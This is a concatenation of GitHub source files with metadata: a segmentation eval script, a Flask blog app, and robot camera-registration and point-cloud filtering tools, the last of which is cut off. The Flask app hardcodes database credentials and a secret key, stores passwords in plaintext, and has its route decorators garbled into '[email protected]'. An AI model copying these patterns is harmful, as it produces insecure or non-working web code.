name (default: lw_refine).')\n parser.add_argument(\"--test-dir\", type=str, default='./dataset/',\n help=\"Path to the test set directory.\")\n parser.add_argument(\"--test-list\", type=str, nargs='+', default='./dataset/test.txt',\n help=\"Path to the test set list.\")\n parser.add_argument(\"--out-dir\", type=str, nargs='+', default='test_result',\n help=\"Path to the test set result.\")\n parser.add_argument(\"--ckpt-path\", type=str, default=CKPT_PATH,\n help=\"Path to the checkpoint file.\")\n\n return parser.parse_args()\n\n\ndef load_ckpt(\n ckpt_path, ckpt_dict\n ):\n best_val = epoch_start = 0\n if os.path.exists(args.ckpt_path):\n ckpt = torch.load(ckpt_path)\n for (k, v) in ckpt_dict.items():\n if k in ckpt:\n v.load_state_dict(ckpt[k])\n return best_val, epoch_start\n\n\ndef validate(segmenter, val_loader, num_classes=-1, outdir='test_result'):\n \n pallete = [\n 0, 0, 0,\n 255, 255, 255,\n ]\n if not os.path.exists(outdir):\n os.makedirs(outdir)\n segmenter.eval()\n cm = np.zeros((num_classes, num_classes), dtype=int)\n with torch.no_grad():\n for i, sample in enumerate(val_loader):\n input = sample['image']\n target = sample['mask']\n input = torch.autograd.Variable(torch.reshape(input, (1, 3, input.shape[2], input.shape[3]))).float().cuda()\n \n output = segmenter(input)\n\n if MODEL == 'lw_refine':\n output = cv2.resize(output[0, :num_classes].data.cpu().numpy().transpose(1, 2, 0),\n target.size()[1:][::-1],\n interpolation=cv2.INTER_CUBIC).argmax(axis=2).astype(np.uint8)\n \n else:\n output = output[0].squeeze(0)\n output = cv2.resize(output.data.cpu().numpy().transpose(1, 2, 0),\n target.size()[1:][::-1],\n interpolation=cv2.INTER_CUBIC).argmax(axis=2).astype(np.uint8)\n \n out_img = Image.fromarray(output.astype('uint8'))\n out_img.putpalette(pallete)\n out_img.save(outdir + '/seg{}.png'.format(i))\n \n im = cv2.imread(outdir + '/seg{}.png'.format(i), cv2.IMREAD_GRAYSCALE)\n kernel = np.ones((9, 9), np.uint8)\n opening = cv2.morphologyEx(im, cv2.MORPH_OPEN, kernel, iterations=2)\n cv2.imwrite(outdir + '/seg{}.png'.format(i), opening)\n\ndef main():\n global args\n args = get_arguments()\n torch.backends.cudnn.deterministic = True\n torch.cuda.manual_seed_all(42)\n global MODEL\n MODEL = args.model\n if MODEL == 'lw_refine':\n segmenter = nn.DataParallel(lw.rf_lw50(2, True)).cuda()\n best_val, epoch_start = load_ckpt(args.ckpt_path, {'segmenter' : segmenter})\n else:\n segmenter = fs.get_fast_scnn().to(torch.device(\"cuda:0\"))\n torch.cuda.empty_cache()\n if MODEL == 'fast_scnn':\n composed_val = transforms.Compose([Resize(), Normalise(*NORMALISE_PARAMS), ToTensor()])\n else:\n composed_val = transforms.Compose([Normalise(*NORMALISE_PARAMS), ToTensor()])\n testset = Dataset(data_file=args.test_list,\n data_dir=args.test_dir,\n transform_trn=None,\n transform_val=composed_val)\n\n test_loader = DataLoader(testset,\n batch_size=1,\n shuffle=False,\n num_workers=16,\n pin_memory=True)\n test_loader.dataset.set_stage('val')\n\n return validate(segmenter, test_loader, num_classes=2, outdir=args.out_dir)\n\n\nif __name__ == '__main__':\n main()\n"
},
{
"alpha_fraction": 0.6861313581466675,
"alphanum_fraction": 0.6897810101509094,
"avg_line_length": 27.842105865478516,
"blob_id": "cc18ac6fa9b71b9876d7da5d50291d231d9eb41f",
"content_id": "0b5a2ac73d2d712f329a83aa6571b1449f51a457",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 548,
"license_type": "no_license",
"max_line_length": 76,
"num_lines": 19,
"path": "/README.md",
"repo_name": "victorkitov/foreground_dataset",
"src_encoding": "UTF-8",
"text": "# BF_Style\n\n\nTo download pretrained models for testing (in **ckpt**): \n```\n./load_models.sh\n```\n\nTo test on images from **test.txt**:\n```\npython eval.py --model lw_refine\n```\nOther arguments:\n```\n--test-dir, default='./dataset/', path to the test set directory\n--test-list, default='./dataset/test.txt', path to the test set list\n--out-dir, default='test_result', path to the test set result\n--ckpt-path, default='./ckpt/lw_refine.pth.tar', path to the checkpoint file\n```\n"
}
] | 2 |
jjstonebarger/blogz
|
https://github.com/jjstonebarger/blogz
|
4e2df6a4fed7d83b908931936aec878675c96917
|
5fc413ca4586d7054dc169c646dbcdd02c52c1fb
|
bb00f186ca47300a46943b58271d63ad63aa633b
|
refs/heads/master
| 2020-04-01T14:55:35.806890 | 2018-10-17T02:18:31 | 2018-10-17T02:18:31 | 153,313,833 | 1 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6219310164451599,
"alphanum_fraction": 0.6245517134666443,
"avg_line_length": 35.255001068115234,
"blob_id": "a8076da604708339e1e52aa7e69b7ea6840d6cca",
"content_id": "800d0bca2f69c663040fc97684509467e17ec0a6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 7250,
"license_type": "no_license",
"max_line_length": 116,
"num_lines": 200,
"path": "/main.py",
"repo_name": "jjstonebarger/blogz",
"src_encoding": "UTF-8",
"text": "\"\"\" \nFor /login page:\n\nUser enters a username that is stored in the database with the correct password and is redirected to \nthe /newpost page with their username being stored in a session. X\n\nUser enters a username that is stored in the database with an incorrect password and is redirected \nto the /login page with a message that their password is incorrect. X\n\nUser tries to login with a username that is not stored in the database and is redirected to the \n/login page with a message that this username does not exist. X\n\nUser does not have an account and clicks \"Create Account\" and is directed to the /signup page. X\n\n=====================================================================================================\n\nFor /signup page:\n\nUser enters new, valid username, a valid password, and verifies password correctly and is redirected \nto the '/newpost' page with their username being stored in a session. x\n\nUser leaves any of the username, password, or verify fields blank and gets an error message that one \nor more fields are invalid. X\n\nUser enters a username that already exists and gets an error message that username already exists. X\n\nUser enters different strings into the password and verify fields and gets an error message that the \npasswords do not match. X\n\nUser enters a password or username less than 3 characters long and gets either an invalid username \nor an invalid password message. X\n\n=====================================================================================================\n\nFunctionality Check:\n\nUser is logged in and adds a new blog post, then is redirected to a page featuring the individual \nblog entry they just created (as in Build-a-Blog). X\n\nUser visits the /blog page and sees a list of all blog entries by all users. X\n\nUser clicks on the title of a blog entry on the /blog page and lands on the individual blog entry page. X\n\nUser clicks \"Logout\" and is redirected to the /blog page and is unable to access the /newpost page \n(is redirected to /login page instead) X\n\n========================================================================================================\n\nCreate Dynamic User Pages:\n\nUser is on the / page (\"Home\" page) and clicks on an author's username in the list and lands on the \nindividual blog user's page. X\n\nUser is on the /blog page and clicks on the author's username in the tagline and lands on the \nindividual blog user's page. X\n\nUser is on the individual entry page (e.g., /blog?id=1) and clicks on the author's username in\nthe tagline and lands on the individual blog user's page X\n\n\"\"\"\n\n\nfrom flask import Flask, request, redirect, render_template, session, flash\nfrom flask_sqlalchemy import SQLAlchemy\n\n\ndb_name = 'blogs'\ndb_user = 'blogs'\ndb_pass = 'withoutaz'\ndb_server = 'localhost'\ndb_port = '8889'\n\napp = Flask(__name__)\napp.config['DEBUG'] = True \napp.config['SQLALCHEMY_DATABASE_URI'] = 'mysql+pymysql://'+db_user+':'+db_pass+'@'+db_server+':'+db_port+'/'+db_name\napp.config['SQLALCHEMY_ECHO'] = True\ndb = SQLAlchemy(app)\napp.secret_key = 'hellofriend'\n\nclass Blog(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n title = db.Column(db.String(120))\n body = db.Column(db.Text())\n owner_id = db.Column(db.Integer, db.ForeignKey('user.id'))\n\n def __init__(self, title, body, owner):\n self.title = title\n self.body = body\n self.owner = owner\n\nclass User(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n username = db.Column(db.String(120), unique = True)\n password = db.Column(db.String(120))\n blogs = db.relationship('Blog', backref='owner')\n\n def __init__(self, username, password):\n self.username = username\n self.password = password\n\[email protected]_request\ndef require_login():\n allowed_routes = ['index', 'login', 'signup', 'blog']\n if request.endpoint not in allowed_routes and 'username' not in session:\n return redirect('/login') \n\[email protected]('/', methods=['GET'])\ndef index():\n users = User.query.all()\n return render_template('index.html', page_title= 'Blogz', users=users)\n\[email protected]('/login', methods=['POST', 'GET'])\ndef login():\n if request.method == 'POST':\n username = request.form['username']\n password = request.form['password']\n user = User.query.filter_by(username=username).first()\n if user and user.password == password:\n session['username'] = username\n flash(\"Logged in\")\n return redirect('/blog/newpost')\n else:\n flash('User password incorrect, or user does not exist', 'error')\n return render_template('login.html')\[email protected]('/signup', methods=['POST', 'GET'])\ndef signup():\n username = \"\"\n if request.method == 'POST':\n username = request.form['username']\n password = request.form['password']\n verify = request.form['verify']\n\n existing_user = User.query.filter_by(username=username).first()\n if existing_user:\n flash('Username already in use', 'error')\n elif len(username) < 3 or len(password) < 3:\n flash('Invalid username or invalid password')\n elif password != verify:\n flash('Passwords do not match', 'error')\n elif not existing_user and password == verify:\n new_user = User(username, password)\n db.session.add(new_user)\n db.session.commit()\n session['username'] = username\n return redirect('/blog/newpost')\n \n return render_template('signup.html', username = username)\[email protected]('/logout')\ndef logout():\n del session['username']\n flash('Logged out')\n return redirect('/blog')\n\[email protected]('/blog/newpost', methods=['POST', 'GET'])\ndef newpost():\n title = \"\"\n title_error = \"\"\n body = \"\"\n body_error = \"\"\n owner = User.query.filter_by(username = session['username']).first()\n\n if request.method == 'POST':\n title = request.form['title']\n body = request.form['body']\n\n if not len(title) > 0:\n title_error = \"Title must contain a value\"\n \n if not len(body) > 0:\n body_error = \"Body must contian a value\"\n \n if not(title_error) and not(body_error):\n new_post = Blog(title = title, body = body, owner = owner )\n db.session.add(new_post)\n db.session.commit()\n db.session.refresh(new_post)\n return redirect('/blog?id='+ str(new_post.id)) \n \n return render_template('newpost.html', page_title = \"Add A Post\", title = title, \n title_error = title_error, body = body, body_error = body_error) \n\[email protected]('/blog', methods=['GET'])\ndef blog():\n blogs = []\n view = 'default'\n if request.args:\n id = request.args.get('id')\n username = request.args.get('user')\n if id:\n blogs.append(Blog.query.get(id))\n view = 'single'\n elif username:\n owner = User.query.filter_by(username = username).first()\n blogs = Blog.query.filter_by(owner = owner).all()\n else:\n blogs = Blog.query.all()\n return render_template('blog.html', page_title='Blogz', blogs=blogs,view=view)\n\nif __name__ == '__main__':\n app.run()"
}
] | 1 |
BerkeleyAutomation/perception
|
https://github.com/BerkeleyAutomation/perception
|
5a3030674b26ea053982a8a2b4ad28ffa9ce41d5
|
6d838860ba0c1b35be6d0bc1511e99a3d12e66a7
|
d38b5f2bed05352186d976dd5c045da02d127e21
|
refs/heads/master
| 2022-05-04T23:01:04.327748 | 2022-03-26T05:24:03 | 2022-03-28T18:01:31 | 72,058,950 | 74 | 38 |
Apache-2.0
| 2016-10-27T01:19:32 | 2022-02-10T03:58:52 | 2022-03-28T18:01:31 |
Python
|
[
{
"alpha_fraction": 0.4692997932434082,
"alphanum_fraction": 0.47959235310554504,
"avg_line_length": 36.073307037353516,
"blob_id": "f50666299ca86792b8101e112df9cc8970d5d919",
"content_id": "3de9c10650b059cf4026a301cd4ec576ac17faa6",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 19723,
"license_type": "permissive",
"max_line_length": 79,
"num_lines": 532,
"path": "/tools/register_camera.py",
"repo_name": "BerkeleyAutomation/perception",
"src_encoding": "UTF-8",
"text": "\"\"\"\nScript to register sensors to a chessboard for the YuMi setup\nAuthors: Jeff Mahler and Brenton Chu\n\"\"\"\nimport argparse\nimport logging\nimport os\nimport time\nimport traceback\n\nimport cv2\nimport numpy as np\nimport rosgraph.roslogging as rl\nimport rospy\nfrom autolab_core import (\n CameraChessboardRegistration,\n Point,\n PointCloud,\n RigidTransform,\n YamlConfig,\n keyboard_input,\n)\nfrom visualization import Visualizer3D as vis3d\nfrom yumipy import YuMiConstants as YMC\nfrom yumipy import YuMiRobot\n\nfrom perception import RgbdSensorFactory\n\nglobal clicked_pt\nclicked_pt = None\npt_radius = 2\npt_color = (255, 0, 0)\n\n\ndef click_gripper(event, x, y, flags, param):\n global clicked_pt\n if event == cv2.EVENT_LBUTTONDBLCLK:\n clicked_pt = np.array([x, y])\n logging.info(\"Clicked: {}\".format(clicked_pt))\n\n\nif __name__ == \"__main__\":\n logging.getLogger().setLevel(logging.INFO)\n\n # parse args\n parser = argparse.ArgumentParser(\n description=\"Register a camera to a robot\"\n )\n parser.add_argument(\n \"--config_filename\",\n type=str,\n default=\"cfg/tools/register_camera.yaml\",\n help=\"filename of a YAML configuration for registration\",\n )\n args = parser.parse_args()\n config_filename = args.config_filename\n config = YamlConfig(config_filename)\n\n # get known tf from chessboard to world\n T_cb_world = RigidTransform.load(config[\"chessboard_tf\"])\n\n # initialize node\n rospy.init_node(\"register_camera\", anonymous=True)\n logging.getLogger().addHandler(rl.RosStreamHandler())\n\n # get camera sensor object\n for sensor_frame, sensor_data in config[\"sensors\"].iteritems():\n logging.info(\"Registering %s\" % (sensor_frame))\n sensor_config = sensor_data[\"sensor_config\"]\n registration_config = sensor_data[\"registration_config\"].copy()\n registration_config.update(config[\"chessboard_registration\"])\n\n # open sensor\n try:\n sensor_type = sensor_config[\"type\"]\n sensor_config[\"frame\"] = sensor_frame\n logging.info(\"Creating sensor\")\n sensor = RgbdSensorFactory.sensor(sensor_type, sensor_config)\n logging.info(\"Starting sensor\")\n sensor.start()\n ir_intrinsics = sensor.ir_intrinsics\n logging.info(\"Sensor initialized\")\n\n # register\n reg_result = CameraChessboardRegistration.register(\n sensor, registration_config\n )\n T_camera_world = T_cb_world * reg_result.T_camera_cb\n\n logging.info(\"Final Result for sensor %s\" % (sensor_frame))\n logging.info(\"Rotation: \")\n logging.info(T_camera_world.rotation)\n logging.info(\"Quaternion: \")\n logging.info(T_camera_world.quaternion)\n logging.info(\"Translation: \")\n logging.info(T_camera_world.translation)\n\n except Exception:\n logging.error(\"Failed to register sensor {}\".format(sensor_frame))\n traceback.print_exc()\n continue\n\n # fix the chessboard corners\n if config[\"fix_orientation_cb_to_world\"]:\n # read params\n num_pts_x = config[\"grid_x\"]\n num_pts_y = config[\"grid_y\"]\n grid_width = config[\"grid_width\"]\n grid_height = config[\"grid_height\"]\n gripper_height = config[\"gripper_height\"]\n grid_center_x = config[\"grid_center_x\"]\n grid_center_y = config[\"grid_center_y\"]\n\n # determine robot poses\n robot_poses = []\n for i in range(num_pts_x):\n x = (\n -float(grid_width) / 2\n + grid_center_x\n + float(i * grid_width) / num_pts_x\n )\n for j in range(num_pts_y):\n y = (\n -float(grid_height) / 2\n + grid_center_y\n + float(j * grid_height) / num_pts_y\n )\n\n # form robot pose\n R_robot_world = np.array(\n [[1, 0, 0], [0, 0, 1], [0, -1, 0]]\n )\n t_robot_world = np.array([x, y, gripper_height])\n T_robot_world = RigidTransform(\n rotation=R_robot_world,\n translation=t_robot_world,\n from_frame=\"gripper\",\n to_frame=\"world\",\n )\n robot_poses.append(T_robot_world)\n\n # start robot\n y = YuMiRobot(tcp=YMC.TCP_SUCTION_STIFF)\n y.set_z(\"fine\")\n y.reset_home()\n global clicked_pt\n\n # iteratively go to poses\n robot_points_camera = []\n for robot_pose in robot_poses:\n # reset clicked pt\n clicked_pt = None\n\n # move to pose\n y.right.goto_pose(robot_pose, wait_for_res=True)\n\n # capture image\n color_im, depth_im, _ = sensor.frames()\n depth_im = depth_im.inpaint(0.25)\n cv2.namedWindow(\"click\")\n cv2.setMouseCallback(\"click\", click_gripper)\n while True:\n if clicked_pt is None:\n cv2.imshow(\"click\", color_im.data)\n else:\n im = color_im.data.copy()\n cv2.circle(\n im,\n tuple(clicked_pt.tolist()),\n pt_radius,\n pt_color,\n -1,\n )\n cv2.imshow(\"click\", im)\n key = cv2.waitKey(1) & 0xFF\n if key == ord(\"q\") and clicked_pt is not None:\n logging.info(\"Moving to next pose\")\n break\n\n # store clicked pt in 3D\n logging.info(\"Point collection complete\")\n depth = depth_im[clicked_pt[1], clicked_pt[0]]\n p = ir_intrinsics.deproject_pixel(\n depth, Point(clicked_pt, frame=ir_intrinsics.frame)\n )\n\n robot_points_camera.append(p.data)\n\n # reset\n y.reset_home()\n y.stop()\n\n # collect\n true_robot_points_world = PointCloud(\n np.array([T.translation for T in robot_poses]).T,\n frame=ir_intrinsics.frame,\n )\n est_robot_points_world = T_camera_world * PointCloud(\n np.array(robot_points_camera).T, frame=ir_intrinsics.frame\n )\n mean_true_robot_point = np.mean(\n true_robot_points_world.data, axis=1\n ).reshape(3, 1)\n mean_est_robot_point = np.mean(\n est_robot_points_world.data, axis=1\n ).reshape(3, 1)\n\n # fit a plane\n best_R_cb_world = None\n best_dist = np.inf\n k = 0\n K = 25\n num_poses = len(robot_poses)\n sample_size = int(num_poses * 0.3)\n min_inliers = int(num_poses * 0.6)\n dist_thresh = 0.0015\n true_robot_points_world._data = (\n true_robot_points_world._data - mean_true_robot_point\n )\n est_robot_points_world._data = (\n est_robot_points_world._data - mean_est_robot_point\n )\n while k < K:\n ind = np.random.choice(\n num_poses, size=sample_size, replace=False\n )\n H = est_robot_points_world.data[:, ind].dot(\n true_robot_points_world.data[:, ind].T\n )\n U, S, V = np.linalg.svd(H)\n R_cb_world = V.T.dot(U.T)\n\n fixed_robot_points_world = R_cb_world.dot(\n est_robot_points_world.data\n )\n diffs = fixed_robot_points_world - true_robot_points_world.data\n dists = np.linalg.norm(diffs, axis=0)\n inliers = np.where(dists < dist_thresh)[0]\n num_inliers = inliers.shape[0]\n\n print(k, num_inliers, np.mean(dists))\n\n if num_inliers >= min_inliers:\n ind = inliers\n H = est_robot_points_world.data[:, ind].dot(\n true_robot_points_world.data[:, ind].T\n )\n U, S, V = np.linalg.svd(H)\n R_cb_world = V.T.dot(U.T)\n\n fixed_robot_points_world = R_cb_world.dot(\n est_robot_points_world.data\n )\n diffs = (\n fixed_robot_points_world - true_robot_points_world.data\n )\n dists = np.linalg.norm(diffs, axis=0)\n\n mean_dist = np.mean(dists[ind])\n if mean_dist < best_dist:\n best_dist = mean_dist\n best_R_cb_world = R_cb_world\n k += 1\n\n R_cb_world = best_R_cb_world\n T_corrected_cb_world = RigidTransform(\n rotation=R_cb_world, from_frame=\"world\", to_frame=\"world\"\n )\n R_cb_world = R_cb_world.dot(T_cb_world.rotation)\n T_cb_world = RigidTransform(\n rotation=R_cb_world,\n translation=T_cb_world.translation,\n from_frame=T_cb_world.from_frame,\n to_frame=T_cb_world.to_frame,\n )\n T_camera_world = T_cb_world * reg_result.T_camera_cb\n T_cb_world.save(config[\"chessboard_tf\"])\n\n # vis\n if config[\"vis_points\"]:\n _, depth_im, _ = sensor.frames()\n points_world = T_camera_world * ir_intrinsics.deproject(\n depth_im\n )\n true_robot_points_world = PointCloud(\n np.array([T.translation for T in robot_poses]).T,\n frame=ir_intrinsics.frame,\n )\n est_robot_points_world = T_camera_world * PointCloud(\n np.array(robot_points_camera).T, frame=ir_intrinsics.frame\n )\n mean_est_robot_point = np.mean(\n est_robot_points_world.data, axis=1\n ).reshape(3, 1)\n est_robot_points_world._data = (\n est_robot_points_world._data\n - mean_est_robot_point\n + mean_true_robot_point\n )\n fixed_robot_points_world = (\n T_corrected_cb_world * est_robot_points_world\n )\n mean_fixed_robot_point = np.mean(\n fixed_robot_points_world.data, axis=1\n ).reshape(3, 1)\n fixed_robot_points_world._data = (\n fixed_robot_points_world._data\n - mean_fixed_robot_point\n + mean_true_robot_point\n )\n vis3d.figure()\n vis3d.points(\n points_world,\n color=(0, 1, 0),\n subsample=10,\n random=True,\n scale=0.001,\n )\n vis3d.points(\n true_robot_points_world, color=(0, 0, 1), scale=0.001\n )\n vis3d.points(\n fixed_robot_points_world, color=(1, 1, 0), scale=0.001\n )\n vis3d.points(\n est_robot_points_world, color=(1, 0, 0), scale=0.001\n )\n vis3d.pose(T_camera_world)\n vis3d.show()\n\n # save tranformation arrays based on setup\n output_dir = os.path.join(config[\"calib_dir\"], sensor_frame)\n if not os.path.exists(output_dir):\n os.makedirs(output_dir)\n pose_filename = os.path.join(\n output_dir, \"%s_to_world.tf\" % (sensor_frame)\n )\n T_camera_world.save(pose_filename)\n intr_filename = os.path.join(output_dir, \"%s.intr\" % (sensor_frame))\n ir_intrinsics.save(intr_filename)\n f = open(\n os.path.join(output_dir, \"corners_cb_%s.npy\" % (sensor_frame)), \"w\"\n )\n np.save(f, reg_result.cb_points_cam.data)\n\n # move the robot to the chessboard center for verification\n if config[\"use_robot\"]:\n # get robot type\n robot_type = \"yumi\"\n if \"robot_type\" in config.keys():\n robot_type = config[\"robot_type\"]\n\n # find the rightmost and further cb point in world frame\n cb_points_world = T_camera_world * reg_result.cb_points_cam\n cb_point_data_world = cb_points_world.data\n dir_world = np.array([-1.0, 1.0, 0])\n dir_world = dir_world / np.linalg.norm(dir_world)\n ip = dir_world.dot(cb_point_data_world)\n\n # open interface to robot\n if robot_type == \"ur5\":\n from ur_control import (\n KINEMATIC_AVOIDANCE_JOINTS,\n UniversalRobot,\n )\n\n robot = UniversalRobot()\n robot.reset_home()\n else:\n y = YuMiRobot(tcp=YMC.TCP_SUCTION_STIFF)\n y.reset_home()\n robot = y.right\n waypoints = []\n time.sleep(1)\n\n # choose target point #1\n target_ind = np.where(ip == np.max(ip))[0]\n target_pt_world = cb_points_world[target_ind[0]]\n\n # create robot pose relative to target point\n if robot_type == \"ur5\":\n R_gripper_world = np.array(\n [[-1.0, 0, 0], [0, 1.0, 0], [0, 0, -1.0]]\n )\n else:\n R_gripper_world = np.array(\n [[1.0, 0, 0], [0, -1.0, 0], [0, 0, -1.0]]\n )\n t_gripper_world = np.array(\n [\n target_pt_world.x + config[\"gripper_offset_x\"],\n target_pt_world.y + config[\"gripper_offset_y\"],\n target_pt_world.z + config[\"gripper_offset_z\"],\n ]\n )\n T_gripper_world = RigidTransform(\n rotation=R_gripper_world,\n translation=t_gripper_world,\n from_frame=\"gripper\",\n to_frame=\"cb\",\n )\n logging.info(\n \"Moving robot to point x=%f, y=%f, z=%f\"\n % (t_gripper_world[0], t_gripper_world[1], t_gripper_world[2])\n )\n\n T_lift = RigidTransform(\n translation=(0, 0, 0.05), from_frame=\"cb\", to_frame=\"cb\"\n )\n T_gripper_world_lift = T_lift * T_gripper_world\n T_orig_gripper_world_lift = T_gripper_world_lift.copy()\n\n if config[\"vis_cb_corners\"]:\n _, depth_im, _ = sensor.frames()\n points_world = T_camera_world * ir_intrinsics.deproject(\n depth_im\n )\n vis3d.figure()\n vis3d.points(cb_points_world, color=(0, 0, 1), scale=0.005)\n vis3d.points(\n points_world,\n color=(0, 1, 0),\n subsample=10,\n random=True,\n scale=0.001,\n )\n vis3d.pose(T_camera_world)\n vis3d.pose(T_gripper_world_lift)\n vis3d.pose(T_gripper_world)\n vis3d.pose(T_cb_world)\n vis3d.pose(RigidTransform())\n vis3d.table(dim=0.5, T_table_world=T_cb_world)\n vis3d.show()\n\n if robot_type == \"ur5\":\n robot.movej(KINEMATIC_AVOIDANCE_JOINTS, wait_for_res=True)\n robot.goto_pose(T_gripper_world_lift)\n else:\n robot.goto_pose(T_gripper_world_lift)\n robot.goto_pose(T_gripper_world)\n\n # wait for human measurement\n keyboard_input(\"Take measurement. Hit [ENTER] when done\")\n robot.goto_pose(T_gripper_world_lift)\n\n # choose target point 2\n target_ind = np.where(ip == np.min(ip))[0]\n target_pt_world = cb_points_world[target_ind[0]]\n\n # create robot pose relative to target point\n t_gripper_world = np.array(\n [\n target_pt_world.x + config[\"gripper_offset_x\"],\n target_pt_world.y + config[\"gripper_offset_y\"],\n target_pt_world.z + config[\"gripper_offset_z\"],\n ]\n )\n T_gripper_world = RigidTransform(\n rotation=R_gripper_world,\n translation=t_gripper_world,\n from_frame=\"gripper\",\n to_frame=\"cb\",\n )\n logging.info(\n \"Moving robot to point x=%f, y=%f, z=%f\"\n % (t_gripper_world[0], t_gripper_world[1], t_gripper_world[2])\n )\n\n T_lift = RigidTransform(\n translation=(0, 0, 0.05), from_frame=\"cb\", to_frame=\"cb\"\n )\n T_gripper_world_lift = T_lift * T_gripper_world\n robot.goto_pose(T_gripper_world_lift)\n robot.goto_pose(T_gripper_world)\n\n # wait for human measurement\n keyboard_input(\"Take measurement. Hit [ENTER] when done\")\n robot.goto_pose(T_gripper_world_lift)\n robot.goto_pose(T_orig_gripper_world_lift)\n\n # choose target point 3\n dir_world = np.array([1.0, 1.0, 0])\n dir_world = dir_world / np.linalg.norm(dir_world)\n ip = dir_world.dot(cb_point_data_world)\n target_ind = np.where(ip == np.max(ip))[0]\n target_pt_world = cb_points_world[target_ind[0]]\n\n # create robot pose relative to target point\n t_gripper_world = np.array(\n [\n target_pt_world.x + config[\"gripper_offset_x\"],\n target_pt_world.y + config[\"gripper_offset_y\"],\n target_pt_world.z + config[\"gripper_offset_z\"],\n ]\n )\n T_gripper_world = RigidTransform(\n rotation=R_gripper_world,\n translation=t_gripper_world,\n from_frame=\"gripper\",\n to_frame=\"cb\",\n )\n logging.info(\n \"Moving robot to point x=%f, y=%f, z=%f\"\n % (t_gripper_world[0], t_gripper_world[1], t_gripper_world[2])\n )\n\n T_lift = RigidTransform(\n translation=(0, 0, 0.05), from_frame=\"cb\", to_frame=\"cb\"\n )\n T_gripper_world_lift = T_lift * T_gripper_world\n robot.goto_pose(T_gripper_world_lift)\n robot.goto_pose(T_gripper_world)\n\n # wait for human measurement\n keyboard_input(\"Take measurement. Hit [ENTER] when done\")\n robot.goto_pose(T_gripper_world_lift)\n robot.goto_pose(T_orig_gripper_world_lift)\n\n # stop robot\n robot.reset_home()\n if (\n robot_type != \"ur5\"\n and \"reset_bin\" in config.keys()\n and config[\"reset_bin\"]\n ):\n y.reset_bin()\n if robot_type == \"ur5\":\n robot.stop()\n else:\n y.stop()\n\n sensor.stop()\n"
},
{
"alpha_fraction": 0.5877193212509155,
"alphanum_fraction": 0.5877193212509155,
"avg_line_length": 18,
"blob_id": "88c011accb426745dc830e538f94de4971702601",
"content_id": "b4a49a512fcb739363ee9c4cd7c4ea1d0e95a222",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "reStructuredText",
"length_bytes": 114,
"license_type": "permissive",
"max_line_length": 42,
"num_lines": 6,
"path": "/docs/source/api/camera_intrinsics.rst",
"repo_name": "BerkeleyAutomation/perception",
"src_encoding": "UTF-8",
"text": "Camera Intrinsics\n=================\n\nCameraIntrinsics\n~~~~~~~~~~~~~~~~\n.. autoclass:: perception.CameraIntrinsics\n"
},
{
"alpha_fraction": 0.601046621799469,
"alphanum_fraction": 0.6239802837371826,
"avg_line_length": 30.69268226623535,
"blob_id": "2ce70590705eabac4056db221fb2f00a27368eac",
"content_id": "7f27fbf52ec4e1c42349e105690cd55716739499",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6497,
"license_type": "permissive",
"max_line_length": 79,
"num_lines": 205,
"path": "/tools/filter_images.py",
"repo_name": "BerkeleyAutomation/perception",
"src_encoding": "UTF-8",
"text": "\"\"\"\nTry different image filtering methods\nAuthor: Jeff Mahler\n\"\"\"\nimport argparse\nimport copy\nimport logging\nimport os\nimport time\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pcl\nfrom autolab_core import Box, PointCloud, RigidTransform\nfrom visualization import Visualizer2D as vis2d\nfrom visualization import Visualizer3D as vis3d\n\nfrom perception.virtual_camera_sensor import VirtualSensor\n\nmin_height = 0.001\nmax_height = 0.15\nrescale_factor = 0.5\n\nvis_clipping = False\nvis_segments = False\nvis_final_clouds = False\nvis_final_images = True\n\nif __name__ == \"__main__\":\n # set logging\n logging.getLogger().setLevel(logging.INFO)\n\n # parse args\n parser = argparse.ArgumentParser(description=\"Filter a set of images\")\n parser.add_argument(\n \"image_dir\", type=str, help=\"location to read the images from\"\n )\n parser.add_argument(\"frame\", type=str, help=\"frame of images\")\n args = parser.parse_args()\n image_dir = args.image_dir\n frame = args.frame\n\n # sensor\n sensor = VirtualSensor(image_dir)\n sensor.start()\n camera_intr = sensor.ir_intrinsics\n\n # read tf\n T_camera_world = RigidTransform.load(\n os.path.join(image_dir, \"%s_to_world.tf\" % (frame))\n )\n\n # read images\n color_im, depth_im, _ = sensor.frames()\n\n # inpaint original image\n depth_im_filtered = depth_im.copy()\n depth_im_orig = depth_im.inpaint(rescale_factor)\n\n # timing\n filter_start = time.time()\n\n small_depth_im = depth_im.resize(rescale_factor, interp=\"nearest\")\n small_camera_intr = camera_intr.resize(rescale_factor)\n\n # convert to point cloud in world coords\n deproject_start = time.time()\n point_cloud_cam = small_camera_intr.deproject(small_depth_im)\n point_cloud_cam.remove_zero_points()\n point_cloud_world = T_camera_world * point_cloud_cam\n\n point_cloud_filtered = copy.deepcopy(point_cloud_world)\n logging.info(\"Deproject took %.3f sec\" % (time.time() - deproject_start))\n\n # filter low\n clip_start = time.time()\n low_indices = np.where(point_cloud_world.data[2, :] < min_height)[0]\n point_cloud_filtered.data[2, low_indices] = min_height\n\n # filter high\n high_indices = np.where(point_cloud_world.data[2, :] > max_height)[0]\n point_cloud_filtered.data[2, high_indices] = max_height\n\n # re-project and update depth im\n logging.info(\"Clipping took %.3f sec\" % (time.time() - clip_start))\n\n # vis\n focal_point = np.mean(point_cloud_filtered.data, axis=1)\n if vis_clipping:\n vis3d.figure(\n camera_pose=T_camera_world.as_frames(\"camera\", \"world\"),\n focal_point=focal_point,\n )\n vis3d.points(\n point_cloud_world, scale=0.001, color=(1, 0, 0), subsample=10\n )\n vis3d.points(\n point_cloud_filtered, scale=0.001, color=(0, 0, 1), subsample=10\n )\n vis3d.show()\n\n pcl_start = time.time()\n\n # subsample point cloud\n # rate = int(1.0 / rescale_factor)**2\n # point_cloud_filtered = point_cloud_filtered.subsample(rate, random=False)\n box = Box(\n np.array([0.2, -0.24, min_height]),\n np.array([0.56, 0.21, max_height]),\n frame=\"world\",\n 